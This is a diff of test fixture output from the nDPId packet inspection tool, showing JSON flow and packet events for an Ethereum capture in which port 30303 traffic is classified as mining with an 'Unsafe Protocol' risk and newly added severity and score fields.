-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1578508366058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508366058,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG0R1YY13bwKgBuHZf3W1kMpWvgknUHaAScSBLTAAAAgQFrAQCCApXTVsMItiZpAEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1578508366058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508366058,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwiXAqAG4WGNd291tdl+CSdQdZDKVsIAQECza4gAAAQEICiLYmcZXTVsM"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366073,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366073,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508366073,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPnfAqAG4zr1rI91udl8AOSk+AAAAALAC\/\/8AywAAAgQFtAEDAwUBAQgKItiZ0wAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1578508366081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508366081,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8jPoAACgGJqAN+w7HwKgBuHZf3WZ3LeB+TwsEYqASaN+zCgAAAgQFrAQCCAoTnX6eItiY9AEDAws="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1578508366081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508366081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGW6LAqAG4DfsOx91mdl9PCwRidy3gf4AQECw5oQAAAQEICiLYmdkTnX6e"}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1578508366117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508366117,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGSnvOvWsjwKgBuHZf3W6FBUsAADkpP6AScSCofQAAAgQFrAQCCApn2sBGItiZ0wEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1578508366117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508366117,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPoPAqAG4zr1rI91udl8AOSk\/hQVLAYAQECw4DwAAAQEICiLYmfpn2sBG"}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1578508365189,"flow_last_seen":1578508365942,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":2209,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364925,"flow_last_seen":1578508364954,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Mining"}}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364697,"flow_last_seen":1578508364773,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1578508365189,"flow_last_seen":1578508365942,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":2209,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
